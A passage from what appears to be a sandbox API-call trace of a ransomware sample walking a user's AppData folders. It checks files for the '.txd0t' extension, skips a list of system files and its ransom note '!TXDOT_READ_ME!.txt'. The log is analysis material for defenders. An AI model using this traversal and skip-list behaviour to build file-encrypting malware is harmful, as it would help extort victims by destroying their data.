nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0129.124] StrCmpW (psz1="PeerDistRepub", psz2=".") returned 1 [0129.124] StrCmpW (psz1="PeerDistRepub", psz2="..") returned 1 [0129.124] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="PeerDistRepub", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0129.125] StrCmpW (psz1="Publishers", psz2=".") returned 1 [0129.125] StrCmpW (psz1="Publishers", psz2="..") returned 1 [0129.125] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Publishers", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0x501e95f1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resmon.ResmonCfg.txd0t", cAlternateFileName="RESMON~1.TXD")) returned 1 [0129.125] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2=".") returned 1 [0129.125] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2="..") returned 1 [0129.125] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Resmon.ResmonCfg.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t" [0129.125] PathFindExtensionW (pszPath="Resmon.ResmonCfg.txd0t") returned=".txd0t" [0129.125] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3e62068a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x3e62068a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0129.125] StrCmpW (psz1="Temp", psz2=".") returned 1 [0129.125] StrCmpW (psz1="Temp", psz2="..") returned 1 [0129.125] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Temp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0129.125] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0129.125] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0129.125] StrCmpW (psz1="TileDataLayer", psz2=".") returned 1 [0129.125] StrCmpW (psz1="TileDataLayer", psz2="..") returned 1 [0129.125] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="TileDataLayer", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0129.125] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0129.126] StrCmpW (psz1="UNP", psz2=".") returned 1 [0129.126] StrCmpW (psz1="UNP", psz2="..") returned 1 [0129.126] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="UNP", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0129.126] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0129.126] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="VirtualStore", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0129.126] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0129.126] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.126] GetProcessHeap () returned 0xe30000 [0129.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.126] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0129.126] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="LocalLow", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0129.126] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0129.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*" [0129.126] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.127] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0129.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0129.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Adobe", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0129.128] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Mozilla", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0129.128] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Sun", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0129.128] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0129.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Roaming", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.128] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\*") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\*" [0129.129] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.129] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt" [0129.129] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.129] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.129] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.129] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="0R6G zd4i6nTDGa8VNm.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t" [0129.129] PathFindExtensionW (pszPath="0R6G zd4i6nTDGa8VNm.png.txd0t") returned=".txd0t" [0129.129] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.129] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="3QaEJDzGG8TQ5z.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t" [0129.130] PathFindExtensionW (pszPath="3QaEJDzGG8TQ5z.rtf.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="5hVk52ujjP2vb7epC7.xls.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t" [0129.130] PathFindExtensionW (pszPath="5hVk52ujjP2vb7epC7.xls.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="8zg7I2Esm.docx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t" [0129.130] PathFindExtensionW (pszPath="8zg7I2Esm.docx.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Adobe", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="aNTcu_iQUI-LLKOyho.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t" [0129.130] PathFindExtensionW (pszPath="aNTcu_iQUI-LLKOyho.avi.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="c39tCHh.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t" [0129.130] PathFindExtensionW (pszPath="c39tCHh.avi.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.130] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CjrpV8NWiwYR.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t" [0129.130] PathFindExtensionW (pszPath="CjrpV8NWiwYR.png.txd0t") returned=".txd0t" [0129.130] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.131] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", 